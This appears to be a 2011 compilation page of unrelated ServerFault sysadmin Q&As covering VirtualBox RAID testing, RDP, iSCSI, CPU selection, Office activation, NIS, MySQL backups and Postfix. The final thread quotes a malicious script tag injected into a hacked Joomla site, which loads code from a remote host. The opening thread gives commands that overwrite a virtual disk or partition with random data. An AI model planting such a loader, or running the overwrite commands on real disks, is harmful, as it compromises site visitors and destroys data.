Tuesday, January 25, 2011

Simulate a hard disk fail on Virtual Box

I'm testing some NAS setups using VirtualBox, with several virtual hard drives and software RAID.

I would like to test the behavior under certain failures; in particular, I'd like to simulate that one of the hard disks broke and the RAID needs to be rebuilt...

Would it be enough to do a

cat /dev/urandom > /virtualdisk

Or, since the virtual disks are containers, would VBox be unable to use the result, breaking the VirtualBox machine?

  • I don't know that you can fail a hard drive this way in VBox (or any VM -- They're typically designed to pretend hardware is perfect). You can try it and see but the results could be pretty awful...

    A better strategy might be to shut down the VM & remove the disk, power on & do stuff, then shut down & re-add the disk. Another option is to use the software RAID administration tools to mark a drive as failed (almost all of them support this AFAIK), scribble on it from within the VM, then re-add it & watch the rebuild (sketched below with mdadm).
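
    A minimal mdadm version of that, assuming the array is /dev/md0 and the member you want to "fail" is /dev/sdb1 (hypothetical names -- adjust to your layout):

    mdadm --manage /dev/md0 --fail /dev/sdb1          # mark the member as faulty
    mdadm --manage /dev/md0 --remove /dev/sdb1        # pull it out of the array
    dd if=/dev/urandom of=/dev/sdb1 bs=1M count=100   # optionally scribble on it
    mdadm --manage /dev/md0 --add /dev/sdb1           # re-add it and watch the rebuild
    cat /proc/mdstat                                  # check rebuild progress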

    All told, however, the only real test of a drive failure is to put the OS on real hardware and yank out one of the disks -- this is the only way to know for sure how your OS will react on a given piece of hardware with its associated controller quirks.

    From voretaq7
  • I'd just open up the host OS, and move one of the virtual disk set files someplace else, and watch what happens. That would emulate one of the member disks suddenly not being available.
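
    If you prefer to detach the disk cleanly rather than move the file, VBoxManage can do it from the host while the VM is powered off (the VM, controller, and disk names below are hypothetical):

    VBoxManage storageattach "NAS-test" --storagectl "SATA Controller" --port 1 --device 0 --medium none
    # ...boot the VM, watch the degraded array, shut down, then re-attach:
    VBoxManage storageattach "NAS-test" --storagectl "SATA Controller" --port 1 --device 0 --type hdd --medium /path/to/disk2.vdi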

    But as said earlier, that shows how the NAS behaves in that virtualized environment. It may or may not give the identical behavior in a physical configuration.

    From syuroff

Can I Configure a Majority and File Share Quorum Where the File Share is Accessed Over the Internet?

I have a 2-site geographically dispersed Cluster setup and have 1 node in each site. Both sites are connected with FC for large volume synchronous data replication and high-bandwidth network availability.

As I understand it, the best quorum configuration for this setup is Majority and File Share Quorum, and the File Share must reside in a 3rd site. Can the file share be on a hosted machine in a remote site with a reliable private connection?

SharePoint 2010: Can't create a folder in a custom list

Hi,

I'm trying to create folders in a set of custom lists I've created. However, when I try to do this, the New Folder button in the Ribbon is disabled. I read up on the matter, and this led me to try to enable folder creation in List Settings -> Advanced Settings. However, there doesn't seem to be an option to enable folder creation on that page. It shouldn't be a permission-related issue, as I created the lists and I'm also an admin on the farm.

I could use a document library, but we will not be uploading documents to the list, so this is more than I need.

What are my options, or what am I doing wrong?

Thanks, Frank

  • Folders are not supported by custom lists, as custom lists are used more like a database. Instead, use grouping to group the list items according to a certain column value, such as Date, Created By, or a custom column.

    From Mike

Problem with Remote Desktop

I want to connect via RDP, but when I try to log on to my remote desktop, after putting in my user and password I get this error:

the terminal server has exceeded the maximum number of allowed connections

My server is Windows 2003. What should I do? Please help me. Thanks in advance.

  • I'm guessing you're running in the default mode where it only allows two simultaneous connections. There are already two idle sessions connected, so you probably just need to fire up Terminal Server manager and kill one (or more) of the idle sessions. You'll be able to connect after doing this.

    Eva : How can I kill one of the sessions? Thanks
    ErikA : From the horse's mouth: http://technet.microsoft.com/en-us/library/cc759296(WS.10).aspx
    From ErikA
  • Connect to the server's console via RDP then fire up Terminal Services Manager to kill off one of the two in-use sessions (which are probably idle due to someone forgetting to log off).

    mstsc /admin /v:serverName
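
    Or, without the GUI, the stock session tools can do it remotely (the server name and session ID below are placeholders):

    query session /server:YOURSERVER
    logoff 2 /server:YOURSERVER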
    
    Chris_K : Yikes. My answer is startlingly similar to ErikA's. Honest, I was slowly typing while watching a horrible webinar, not plagiarizing!
    Chris S : Happens all the time. Don't worry about it.
    ErikA : No problem at all.
    From Chris_K

Network Share on File Server Cluster being Interrupted.

When I perform heavy disk operations, like deleting 10k files at a time, the network share becomes unresponsive and won't serve out files for a short time.

Here's my configuration. I have a failover file server cluster composed of two Windows 2008 R2 Enterprise servers. Each server is a VM running on top of two independent Dell Poweredge servers running Windows Hyper-V. Both of the Dell servers have dedicated NICs to a Dell MD3000i SAN. Each of the file server VMs route their iSCSI connections through this dedicated NIC for their connection to the volume on the SAN where the files reside.

If I run a batch file that performs 10k deletes from a remote machine that references the file by share name (ie. \\fileserver\sharename\folder\filename.jpg), it may do 1,000 or 8,000 deletes before the share gives out. It's random each time. Ironically, the batch file will continue deleting the files, but other servers accessing files on that same share will get held up. The files I'm deleting would not be accessed by other servers, so locking of those specific files is not an issue.

If I run the same batch file on the master server of the file cluster and reference the files by their local path (ie. x:\folder\filename.jpg), the share cuts out immediately and the other servers sit and wait. Access to that share will resume when I terminate the batch file running.

Anyone have an idea as to the cause of the share cutting out or what I could do to diagnose this issue further? Any suggestions are greatly appreciated.


Updated Note: I've isolated this problem to occurring only within the boundaries of the host box. None of the network traffic involved in replicating this problem with the VMs reaches the physical switch the host box connects to, other than the iSCSI connection to the SAN. The iSCSI connection has its own dedicated switch and private subnet to the SAN, outside of standard network traffic.

  • Good lord. Is there anything in the event viewer to indicate the OS is seeing some sort of resource depletion? Can you inspect with perfmon?

    From mfinni
  • This screams resource depletion of some kind. If this were a Linux host I'd be thinking, "this sounds like a boat load of IO-Wait." Check OS level performance monitors like mfinni pointed out. You have two areas that could be bottle-necking, and that's logical/physical disk performance, and network performance on the iSCSI network connection. PerfMon can give you this. I don't know HyperV at all, but if it is anything like VMWare then you have some performance metrics on the Hypervisor side you can look into as well. Do so.

    As a theory, my guess is that the very high level of metadata updates you're doing is causing some inherent latency in your iSCSI stack to magnify. This in turn crowds out other I/O or metadata requests, which results in the symptoms you describe: other processes can't get a word in edgewise while the MFT blocks are being hammered by this other process. iSCSI itself can cause this, but the VM layer is probably adding its own internal delays. If this is indeed the problem, you might want to consider presenting the iSCSI LUN to the hypervisor instead and then presenting the resulting disk to the VM; that way you're not relying on a virtualized network adapter for iSCSI, you're relying on a physical one.

    Edit: It seems that you probably have this kind of fault on your hands. The PerfMon counters I'd pay attention to are "Bytes Sent/sec" and "Packets Sent/sec" for the interface running the iSCSI connection. The combination of the two should give you your average packet SIZE. (alternately, if you have the ability, throw a sniffer into the loop and see what the packets look like at the network switch. This is the more reliable method if you can do it) If that packet size is pretty small (say, under 800 bytes) then there is not much you can do about this other than get down to the TCP level and see what kind of optimizations can be made between your cluster nodes and the iSCSI target. Server 2008 is picky with its TCP settings, so there may be gains to be made here.
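
    To capture those two counters from the command line on a cluster node, something like this should work (the NIC instance name is a placeholder -- `typeperf -qx "Network Interface"` lists the real ones):

    typeperf "\Network Interface(iSCSI NIC)\Bytes Sent/sec" "\Network Interface(iSCSI NIC)\Packets Sent/sec" -si 5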

    Adam Winter : What you're saying makes sense and has credibility. Any suggestions on how I can prove it? What would I monitor in perfmon to validate this theory? I can't move the iSCSI LUNs to the host box because this is a cluster. If the host box goes down, so do the LUNs, so I have to keep them attached to the VM.
    Adam Winter : Large files copies do not suffer the same problem, but doing a ton of small file deletes locally on the master server of the file cluster kills the share to other servers. If the problem were with the iSCSI going through the virtual switches of Hyper-V, why would it not suffer with big data writes as it does with small requests? I agree that some type of requests are queuing up somewhere, and I need a means of finding out.
    sysadmin1138 : If large-file options don't do it but lots of itty bitty files do, then it is almost definitely meta-data related in some way. What's doing it is probably lots of little data operations on the same few blocks of the file-system. This is the kind of thing that write-combining in RAID cards is designed to help with, but in this case you've got a network stack between you and your RAID cache, and this kind of operation is HIGHLY sensitive to network latency.
    tony roth : do you have the nic's set to auto or manual, how about the switch ports? They need to match.
    Adam Winter : Just had another thought. We setup this file server cluster because we wanted to expand our web hosting environment from 1 server to multiple. The volume on the SAN which the file cluster points to used to be connected to a physical machine using iSCSI running Windows Web 2008. At that time, file ops to this volume were super fast. When we expanded, we mounted this volume to the file cluster running as VMs so that the data would be highly available. Could the move to a VM negatively affect the iSCSI connections? That would imply the virtual switch within Hyper-V is the main culprit.
    sysadmin1138 : The virtual switch in Hyper-V is my top suspect right now. The kind of op you're doing will seriously magnify even small slowdowns in there.
    Adam Winter : One more thought on this subject. Before moving this volume from the physical machine as described above, we converted that physical machine to a virtual machine on the same host as the file cluster node. The iSCSI connection on the web server VM still performed great with the batch file. What would have caused performance to drop when moving that volume from the web server VM to the file server VM on the same host, using the same NICs and virtual switch on the host? Something to do with the cluster service?

Which CPU for XEN - LAMP testbed - Budget

Dear serverfault knowledgeables, I'm in a decision dilemma right now, which I can't resolve due to lack of hands-on experience.

I need to build a testbed for basically virtualizing a LAMP application (OSes not yet decided) including server-side calculations. I'll opt for Xen since it seems better supported by cloud hosting providers at the moment. The hardware is for a proof of concept for a startup doing SaaS and might be used for a closed live alpha/beta later on.

After testing, the testbed might be

a) deployed as a colocated white box server

b) used as workstation

  • Single socket is enough.
  • We want to have ECC memory for reliability; this excludes most of the consumer line at Intel.
  • If an Intel CPU, then a threaded CPU (HT) is preferred.
  • At least 16 GB of RAM.
  • If justified by price, and reliability is not too bad, a high-quality desktop MB instead of a server MB would be worth a try.

It came down to the Opteron 6128 vs. the Xeon 5620 for me after a lot of research, but I don't necessarily have to be right.

Which CPU is preferable concerning TCO (MB price, power requirements 24/7, ...), Opteron 6128 or Xeon 5620? Which one offers better performance in real-world applications? (Do you have any other suggestions I probably overlooked?)

Thank You for Your consideration

  • Some theoretical numbers:

    • Intel E5620: 2.4Ghz with 4 Cores + HT. Turbo-boost can bump that to 2.66Ghz giving approximately 12.5Ghz of aggregate CPU, maybe a bit more if your workload is very HT friendly. Up to 25GByte/sec memory bandwidth provided you populate all three memory channels with 1333Mhz DDR3, or about 6.25GByte/sec per core / 3.125GByte/sec per thread.

    • Opteron 6128: 2Ghz with 8 full cores giving 16Ghz of aggregate CPU, approximately 28.8GByte/sec memory bandwidth given that it has four memory channels per socket (2 per die), or about 3.6GByte/sec per core.

    Obviously not all CPU Ghz are equal and real world numbers will be a lot lower, but there is a clear difference in approach, with Intel currently providing lower [full] core counts that are kept fed with more main memory bandwidth (in total and per core).

    If absolute CPU grunt is what you are looking for then the Opteron will be better; if memory bandwidth per core is more important then the Xeon will be better; if your needs are somewhere in between then the differences will be less clear cut, although I think the AMD edges out the Intel for your type of use cases. Anandtech has a good comparison of the 6 Core Xeon 5670 and the Opteron 6174 that compares the higher end (6 Core Intel vs 12 Core AMD) of these two CPU families, but I think their conclusions will apply more or less to the two lower end CPUs you are looking at.

    On the cost front the Intel CPU is more expensive (the street price difference between the two puts the Xeon E5620 about $120 above the Opteron 6128 at the moment) and it must be configured with memory in sets of 3 DIMMs in order to realise its maximum memory bandwidth. This means that memory sizes of 6, 12 & 18 etc GByte are what you should be looking at. The AMD, having 2 on-die memory controllers, performs best with the more usual 4, 8 & 16 etc. If 16GByte is the minimum you require then you should factor in the additional cost of the extra DIMM(s), which will make the Intel option even more expensive.

    One final detail is that the E5620 supports Intel's new hardware AES instructions that might make a significant difference if your use case makes any significant use of crypto functions that will make use of them.

    Chris S : The Opteron has 2 memory channels per die, and 2 dies per package; your numbers for the Opteron's memory bandwidth should be 28.8 GB/s or 3.6 GB/s/core.
    Helvick : Ah - good point, thanks for catching that - I got myself confused when looking at the specs. I've corrected the content. The key points remain but the bandwidth per core data point is obviously not as significant as I'd made out originally.
    From Helvick
  • "14.4GByte/sec memory bandwidth given that it has two memory channels, or about 1.8GByte/sec per core."..."with Intel currently providing lower [full] core counts that are kept fed with with more main memory bandwidth (in total and per core)."

    Sorry, I don't understand. I've researched for a few hours now and I might be wrong as I've been out of the processor talk for years, but serverfault, Anandtech, wikipedia (sorry), even PCPRO and AMD1, AMD2, AMD3 state that the 6100 series (MC) has 4 memory channels with high memory transfer rates (Anandtech, Anandtech2).

    Sorry, I had to [remove direct references] obfuscate all hyperlinks because of serverfault's limits on low reputation posts. Just take http://developer.amd.com/documentation/articles/pages/Magny-Cours-Direct-Connect-Architecture-2.0.aspx as main reference.

    So please clarify as my maths seem to work differently, but I might be wrong:

    Opteron 6100s have 2 dies per package (= processor housing) and 1 memory controller per die (AMD), each 64 bits wide and running at 1.8 GHz (Anandtech). My maths gives me a 64-bit bus times 1.8 GHz per memory controller (= per die) = 14.4 GB/s per die, not in total, which at 4 cores per die gives 3.6 GB/s per core (if all cores are equally stressed).

    So the Opteron would have more memory bandwidth per core than the Xeon per thread. Also the complete opteron processor would have 28.8 GB/s memory global bandwidth, which is higher than with the Xeon part.

    Thanks for any clarification.

    Chopper3 : Are you looking for absolute power or value here? Your question suggests the latter but now you're interested in top-end detail - I don't understand.
  • When buying metal to run VMs I usually go with the lowest server class cpu I can find, and I target 2~4 gigabytes of ram per core depending on the hardware and the expected workload.

    • "server class" = Xeon or Opteron
    • "lowest" = less GHz and/or watts

    You'll end up having 4 cores sitting idle most of the time waiting for disk activity, unless you have a really good I/O subsystem (big raid with lots of spindles and/or fast disks and/or SSDs, either directly attached or via SAN).

    From Luke404
  • Which CPU is preferable concerning TCO (MB price, power requirements 24/7, ...), Opteron 6128 or Xeon 5620? Which one offers better performance in real-world applications? (Do you have any other suggestions I probably overlooked?)

    • MB Price: Opteron boards are usually a little cheaper than Xeons. Here are a few to mention:
      1. TYAN S8230GM4NR Dual Socket G34 ($469.99)
      2. ASUS KGPE-D16 Dual Socket G34 ($439.99)
      3. SUPERMICRO MBD-H8SGL-F-O ($264.99)
    • Power requirements hands down goes to Opterons as long as you go for HE or EE versions. AFAIK, Opteron 6100 series only has HE (wikipedia).
    • Better performance in real-world applications: This can go either way. Xeons typically do very well with data-crunching operations, largely due to a larger L3 cache, while Opterons typically don't have as much L3. There are other factors in the Xeon's performance, but in your case, I'm not so sure it matters.

    I need to build a testbed for basically virtualizing a LAMP application (OSes not yet decided) including server-side calculations. I'll opt for Xen since it seems better supported by cloud hosting providers at the moment. The hardware is for a proof of concept for a startup doing SaaS and might be used for a closed live alpha/beta later on.

    Okay, so this project is really a "proof of concept for a startup doing SaaS"? Spend as little cash as you can while keeping the most room to upgrade should it be necessary. While I admit my AMD fanboy-ish stance, I'd say for your particular situation I'd focus less on the production/final environment of your product/service and just focus on the test bed aspect.

    Budget is not just a concern, it is the primary concern so just go the cheaper route while meeting your minimum requirements (CPU, 16GB ECC RAM, etc.) which tends to work in favor of AMD as they still use DDR2 for slightly older Opterons (Istanbul, Shanghai, Barcelona). Newer Opterons do use DDR3 which is a little more costly but I'd scale things back as much as you could while having room to grow.

    So for example, maybe get a dual socket board, and high density RAM (4x4GB or 2x8GB DIMMs) so that should you need to expand it's an option. Building servers is largely about budget which translates into whether you have the ability to upgrade. Seeing how this is just a test bed, keep the costs as low as you can.

    Last few notes/suggestions:

    • Keep in mind, technology changes, so even with your alpha/beta product in use, maybe at some point in the future you switch to Xeons. That's totally fine. But there's really nothing you can do now to foresee the future. Just focus on costs and upgrade path and run with it. Don't sweat the infinitesimal details now. Startups need a lot of progress fast.

    • Don't forget about a good RAID controller as well! CPU/RAM don't mean much without some good disk I/O!

    From osij2is
  • Whilst I utterly adore Intel's 55/56xx series chips, know them to be incredibly fast and buy them all the time when I have the luxury of budget - it seems value is more of a concern for you.

    With that in mind I'd like to suggest a third option - AMD's Athlon II X3 440. It's seriously cheap, only has 3 cores but at 3.0Ghz, supports ECC and 16GB as well as coming in mainstream desktop form. If this is purely a PoC system why not get the cheapest thing that'll do the job?

    The CPUs themselves are like $50 (5620's are >6x that) and I just spotted THIS mobo too. Hope this at least makes you think about the problem a different way.

    From Chopper3
  • Your path of least resistance might be to hop onto eBay and buy an HP XW9400. Secondhand ones are quite cheap, although you need to make sure you get one with the right CPU. You want Opteron 237x or 2380 CPUs - 2200 series Opterons don't support nested page tables and 234x/235x series (Barcelona) ones have a hardware bug.

    If you don't mind fitting your own CPU, ones with 2200 series opterons can be bought for a few hundred dollars and you can get an Opteron 2376 for about $500 off ebay. You will need to make sure you get a compatible heatsink, but the ones in the machine will probably do fine.

    XW9400s take DDR2 memory, of which there is a significant glut on the market due to overproduction. 8GB DDR2 ECC registered kits compatible with an XW9400 should cost about $250 each off Ebay. If desired, you can expand the machine to two sockets with 4-6 core Opteron chips and 64GB of RAM.

    This gives you a fairly cheap development workstation with hardware VM support and pretty good quality componentry and buckets of headroom. You can put SAS or SATA disks on it, and it has PCIe -x4/x8 slots that will take most RAID controllers, should you feel the need. Note that the motherboard is an OEM version of a Tyan S2915 (IIRC).

Office 2010 silent activation after unattended installation

I've created an unattended install of Office 2010 using the OCT. We are using a MAK rather than KMS (not my decision). Is there a way to activate Office 2010 after the install? Even though the key is set during the install, it does not activate.

I don't want the users to be prompted to activate since this is going to be in a lab environment.

  • In case anyone was wondering - Office installs OSPP.VBS in the Office14 directory, and it can handle Office activation, among other things.

    In OCT I set it to run c:\windows\system32\cscript C:\"Program Files (x86)\Microsoft Office\Office14\OSPP.VBS" /act during post-installation.

    All Office products are activated after that. I have it silently install Visio, Project, and then Office, then have Office kick off the activation afterwards, and all three products are activated at once.
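
    If you want to verify the result, OSPP.VBS can also report license/activation status (the path below assumes 32-bit Office on 64-bit Windows, as above):

    cscript "C:\Program Files (x86)\Microsoft Office\Office14\OSPP.VBS" /dstatus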

    From MarkM
  • Hi Mark, My University is working on an Office 2010 rollout as well. I think one of our guys may have figured out how to configure the silent installer but now it doesn't run properly in the login script. We would like to put it in the login script and install for certain users on certain days. Do you have any suggestions?

    MarkM : Hi Jen, you should post this as a new question so that others may find it more easily. What doesn't run right in the login script? Did he make a transform by running setup.exe /admin?
    Jen : Thanks, Mark. I will ask the System Admin to chime in. I don't know what he did. Thanks!
    From Jen
  • I have been trying unsuccessfully to push out an Office 2010 install via a Netware 6.5 login script (Netware client 4.91 SP5). We're using the script to call a batch file on a network share which tests for the workstation's installed OS version (WinXP or Win7), then checks for an existing 2010 install, and if not found, runs the Office 2010 setup.exe file.
    The batch file executes as designed; however, setup errors out with the Windows message: "Please go to the Control Panel to install and configure system components." This is the same error that gets returned when I try to install Office 2010 with a Novell ZENworks 7 Application Launcher app.
    Any ideas would be appreciated. My workaround is to email users a shortcut they copy to their desktop that points to the install batch file on a network share; this seems to install the product without issues.

    MarkM : Kevin, can you please post this as a new question. This is a Q&A site and not a forum. I can give you a couple tips, but I am unfamiliar with Novell/Windows integration. You will get much better responses from the community if this is a question of its own.
    From Kevin
  • @Kevin - I've seen this before in my environment. This error usually occurs when the script is finding setup.exe via one of your path variables; what you need to do is point to it using a specific path, e.g. S:\Office2010\setup.exe or \\servername\foldername\setup.exe

    @MarkM - Exactly what I was looking for, Thanks!

    From Carl
  • Not to muddy the waters on this post but I set this up using this command in OCT:
    [WindowsFolder]\system32\cscript [INSTALLLOCATION]\OSPP.VBS
    With the parameter /act.

    Just in case someone else needs that info. Ross

    From boezo
  • Thanks Carl. Putting the UNC path in the batch file which calls the setup and config file worked for me.

    Cheers

    From Jamie
  • Guys,

    I have tried adding [WindowsFolder]\system32\cscript [INSTALLLOCATION]\OSPP.VBS into OCT; however, this did not work.

    I created a batch file separately to run c:\windows\system32\cscript C:\"Program Files (x86)\Microsoft Office\Office14\OSPP.VBS" /act; however, this doesn't work either.

    Users are still getting the activation window on the first run of Office; however, if I log in as an admin, everything works fine :/

    From Greg

PHP exit status 255: what does it mean?

I recently compiled a PHP 5.2.9 binary, and I tried to execute some PHP scripts with it. I can execute some scripts without problems, but one of them halts its execution midway, exiting with no errors or warnings. The returned status code of the process is 255.

I've read in the manual that such status is 'reserved'. The question is: for what?

I believe it's got something to do with missing dependencies in the php executable, but I can't be sure.

Does anyone know what an exit code of 255 means?

thanks,

Silvio

P.S. There are no errors in the PHP scripts; they run OK on other machines.

  • 255 indicates an error; I could reproduce that same exit code by triggering a fatal error.

    This means that your error reporting is somehow being hidden. There are a few possible causes (see the sketch after this list):

    • error_reporting is not set, so PHP reports no errors at all
    • STDERR is redirected somewhere else (php -f somefile.php 2>/dev/null; remove the redirection)
    • It could still be an internal error due to missing dependencies; a fatal error has the same exit code as a program crash.
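
    A quick way to see what is being hidden is to force error display from the command line (the script name is a placeholder):

    php -d display_errors=1 -d error_reporting=-1 -f somefile.php; echo "exit status: $?"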
    From Weboide

Disable nis login for a particular user on a particular machine.

Hi, we have a NIS server and a NIS client in a domain. As the person in charge of a subdomain, I want to enable NIS logins for only some users on a particular machine, and disable the rest of the users. I DO NOT have administrative access to the NIS master password file. Can it be done? If so, how?

e.g.
machine1: all users enabled for nis login
machine2: only xyz and pqr are allowed to login
machine3: abc and def are not allowed, rest all are allowed

In short, to allow/disallow a subset of users from accessing a particular nis-client, without root/administrative privileges to the nis server.

nsswitch.conf looks like this:

#other entries before this
passwd:     files nis
shadow:     files nis
group:      files nis
#other entries after this. 

Client runs Ubuntu 10.04. (Don't flame me for this please :|) My /etc/passwd does not have a +:::::: entry, yet all the users from NIS can log in.

Thanks.

  • Yes, in many ways:

    1. Have a netgroup created by your NIS administrator and "+" the netgroup in /etc/passwd
    2. Explicitly "+" the users who should be allowed to log in to this host in /etc/passwd
    3. "+" everyone (or a netgroup that is a superset) and explicitly "-" the users who SHOULD NOT be allowed to log in to this host in /etc/passwd

    Number 1 is usually considered "more correct" from an admin standpoint
    Number 2 is convenient if you don't have a lot of users who need to access this host and your admin team is slow creating/updating netgroups.
    Number 3 is best if there are a few users who should be excluded but everyone else (or everyone else in a specific netgroup) should have access - e.g. denying an intern access to the NIS master server :-)
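
    For example, the NIS-related tail of the client's /etc/passwd might look like one of the following (user and netgroup names are hypothetical; note that on glibc systems the +/- syntax is generally only honoured with `passwd: compat` in nsswitch.conf rather than `files nis`):

    # option 1: allow only the members of a netgroup
    +@allowed_users::::::
    # option 2: allow only named users
    +xyz::::::
    +pqr::::::
    # option 3: exclude specific users, then allow everyone else (order matters)
    -abc
    -def
    +::::::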

    (If you have had the misfortune to be dropped into a NIS environment and don't have much experience with it I suggest picking up a copy of the O'Reilly "Managing NFS & NIS" Book - http://oreilly.com/catalog/9781565925106 - It's a good bet if you're in a NIS shop someone has a copy laying around :)

    : I'm probably doing something very stupid, but as you said, in the client-side /etc/passwd I added a line +xyz:::::: once, and +xyz once, to allow only xyz to log in, but others are able to log in too. Am I supposed to restart something? Would you be able to correct me please? Thanks.
    voretaq7 : If you are running `nscd` that needs to be restarted, otherwise double check that you don't have any other `+` lines -- you should only have `+user::::::` entries for the people who should have access. If you have a `+::::::` hanging around it will include everyone you don't explicitly `-` out. You can test using the `id` command (People who aren't +'d in shouldn't exist according to `id`). There's also a very slim possibility that your OS has a terribly broken NIS implementation & doesn't respect `+` and `-` lines, but that's not very likely.
    : I'm not sure you'd be reading this comment so late, but can you please check the edit to my original question. I have added the content of file nsswitch.conf, and mentioned the fact that /etc/passwd doesn't already have a +:::::: entry.
    From voretaq7

mysql incremental backup

Right now I have a cron job that dumps my database twice a day. Right now it's fine because my DB is < 100mb. I have limited space on the server (also I'd like to reserve space for other things). How do I make incremental backups with mysql? I would like to do it every 3-4 hours and a full dump on a weekly basis.

How do I do this? Also, I hear using a 'binary log' is good, but I am unsure how to do that properly.

Many links are welcome.

  • Mysql.com explains how to make incremental backups: mysql.com backups. It also tells you how to restore those backups: mysql.com recovery.
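
    In outline, the binary-log approach looks something like this (a sketch, assuming you can edit my.cnf and restart MySQL; paths are placeholders):

    # my.cnf, [mysqld] section -- turn on the binary log:
    #   log-bin = /var/log/mysql/mysql-bin
    #   expire_logs_days = 14

    # incremental run (e.g. every 3-4 hours): rotate, then copy the closed logs
    mysqladmin -u$User -p$Pass flush-logs
    rsync -a /var/log/mysql/mysql-bin.[0-9]* /backups/binlogs/

    # recovery: restore the last full dump, then replay the logs
    mysqlbinlog /backups/binlogs/mysql-bin.[0-9]* | mysql -u root -p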

    Have you tried Gzip'ing your dump files? You should be able to reduce your dump file size by 75%. That would save you a lot of space without the extra effort required for incremental backups.

    mysqldump -p$Pass -u$User $DATABASE | gzip --best > $DATABASE.$TIME.gz
    
    From racyclist
  • If you use the InnoDB storage engine, you have two options. One is the commercial Innobackup solution and the other is XtraBackup by Percona. I use the latter. Not perfect, still a lot of problems, but most of the time it works. BTW, I had better results with the 1.0 version than with later releases. Check http://percona.com.

    From minaev

Can I boot from a software RAID5 setup with linux?

I am planning the setup of a new NAS system, deciding whether to use Openfiler or something similar.

I've been checking some RAID cards, and thinking about hardware failure or substitution, and I wonder whether I could make the system boot directly from a software RAID5, without having to boot from another volume first.

That would give me the flexibility of substituting my hardware in case of any failure, knowing that the software is handling my RAID and I'm not dependent on any particular brand or model...

  • Yes, with a slight modification.

    Partition your disks into two Linux Raid partitions - one 128MB partition for /boot and the rest for RAID5.

    Then use software RAID1 to mirror all the small 128MB partitions.
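
    Roughly, the creation step looks like this (a sketch assuming four disks sda-sdd, with partition 1 for /boot and partition 2 for the data array; adjust device names and levels to your layout):

    mdadm --create /dev/md0 --level=1 --metadata=0.90 --raid-devices=4 /dev/sd[abcd]1   # mirrored /boot (metadata at the end, so the bootloader can read the members)
    mdadm --create /dev/md1 --level=5 --raid-devices=4 /dev/sd[abcd]2                   # RAID5 for everything else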

    You'll end up with something like:

    michael@baron:~$ cat /proc/mdstat 
    Personalities : [raid1] [raid10] 
    md0 : active raid1 sda1[0] sdd1[3] sdc1[2] sdb1[1]
          136448 blocks [4/4] [UUUU]
    
    md1 : active raid10 sda2[0] sdd2[3] sdc2[2] sdb2[1]
          143090816 blocks 64K chunks 2 near-copies [4/4] [UUUU]
    
    Andor : Sounds good... I wonder if Openfiler would have direct support of being installed like that...
    Andor : Works fine... I just have to put it under... 'stress' :D
    From MikeyB

Postfix: Problem resolving email addresses when using external DNS

Hi,

I have a server configuration that includes Postfix and it is configured to use an external DNS. The domain names involved are configured on the same server but are not live yet (externally they do resolve to their correct OLD IP). Basically we are going to switch externally hosted websites to our server and update name servers.

Performing a ping of one of the domains in question will reveal the correct old IP. However, when Postfix attempts to resolve the domain it sees that we have the domains registered on our server and doesn't bother performing a DNS lookup (if it did, it would see that the sites actually exist externally).

Is there any way to force Postfix to ignore the locally-created domain names and always perform a DNS lookup until we are ready to 'turn on' (update nameservers) our newly created domains?

Thanks in advance!

  • Here is the section from main.cf which I believe applies to your situation:

    # In addition to the above, the Postfix SMTP server by default accepts mail
    # that Postfix is final destination for:
    # - destinations that match $inet_interfaces or $proxy_interfaces,
    # - destinations that match $mydestination
    # - destinations that match $virtual_alias_domains,
    # - destinations that match $virtual_mailbox_domains.
    # These destinations do not need to be listed in $relay_domains.
    

    Make sure that your domain is not listed in those locations. Additionally, $myhostname and $mydomain should be free of the domain in question or it will accept mail for that domain. But, you should add it to the $relay_domains so it knows to relay the mail it receives for that domain.
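
    A quick way to check and adjust this from the shell (example.com stands in for the domain in question):

    postconf mydestination virtual_alias_domains virtual_mailbox_domains relay_domains
    postconf -e "relay_domains = example.com"
    postfix reload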

    Edit: Additionally, you may be able to add the mail server hostname to the /etc/hosts file until your nameservers are switched over.

Purpose of JBoss tables

Hi

Can anyone point me in the direction of some documentation (or provide the information here) about the following tables, created by JBoss 5.1.0 when it starts up?

I know what they are for at a high level, and know why they are there, but I could do with some lower-level documentation about each table's purpose.

The tables are:

  • hilosequences
  • timers
  • jbm_counter
  • jbm_dual
  • jbm_id_cache
  • jbm_msg
  • jbm_msg_ref
  • jbm_postoffice
  • jbm_role
  • jbm_tx
  • jbm_user

I know that the first two are associated with uuid-key-generator and the EJB Timer Service respectively, while the rest are associated with JBoss Messaging. What I want to know is something along the lines of "jbm_msg stores each message when it is created...", that kind of thing.

I wasn't sure where to ask this question, ServerFault or StackOverflow, but I decided it wasn't programming related so thought I should put it here - I hope that's ok!

Thanks

Rich

  • Seeing as I had no response here, I've re-asked the question at StackOverflow.com.

    From Rich

Can a VM's virtual disk span over multiple nodes in Ubuntu Enterprise Cloud?

How does storage work with the Ubuntu Enterprise Cloud?

If I have two disks (on separate machines) with free space 10gb and 20gb, can I have a VM running with 30gb of disk space?

  • No, you can't. This may be possible with very specific datastore technology, but I'm not even sure.

  • I'm not familiar with Ubuntu Cloud, so take this with a huge grain of salt. GlusterFS can be configured to provide the storage like you want. There may be performance implications to doing this as well.

    If you're trying to use up every last little gigabyte you've got left, it's probably time for a new HD (or three). If you're just looking for a clustered filesystem so VMs can be bounced around to different hosts easily, Gluster is probably what you're looking for.
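
    For reference, a plain distributed Gluster volume simply aggregates the capacity of its bricks (host and path names below are placeholders):

    gluster volume create vmstore transport tcp host1:/export/brick1 host2:/export/brick2
    gluster volume start vmstore
    mount -t glusterfs host1:/vmstore /mnt/vmstore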

    From Chris S

kollinsoy.skyefenton.com attack?

Recently my website was attacked by malware. It turned my index page blank. The attack added 2 lines to my index.php:

<script type="text/javascript" src="http://kollinsoy.skyefenton.com:8080/Data_Type.js"></script>
<!--6aa6b5f1b4e70b5a72df7793c2b6e64b-->

I'm using Joomla 1.5.11 on a server that was considered secure. How did this happen, and how can I prevent it in the future?

  • 1) latest updates.

    2) run an IDS, and keep checksums of files that aren't supposed to be changing (see the sketch after this list).

    3) consider putting in a system for versioning files that aren't supposed to be changing.

    4) don't run software that isn't necessary.

    5) isolate processes and services as much as possible and run with reduced privileges to the lowest level possible.

    6) subscribe to security and user mailing lists for software you use, like Joomla groups and software you're using for your servers.

    7) backup backup backup

    8) format and reinstall your server from known-good source. You don't know how far the compromise goes back or what rootkits or other issues have been introduced.

    9) install monitoring software on systems for your switches, routers, firewall...get to know "normal" traffic patterns from anomalies, then investigate when something starts looking weird.

    10) stay familiar with your business's servers and workflow. Familiar enough that you can just "Feel" when something isn't right with the servers. Investigate. Check logs.

    11) configure remote logging to a secured server. Compromised systems easily cover their tracks when the logs are local.

    12) pick up some books on system security or delegate someone to be in charge of updates, security issues, etc.

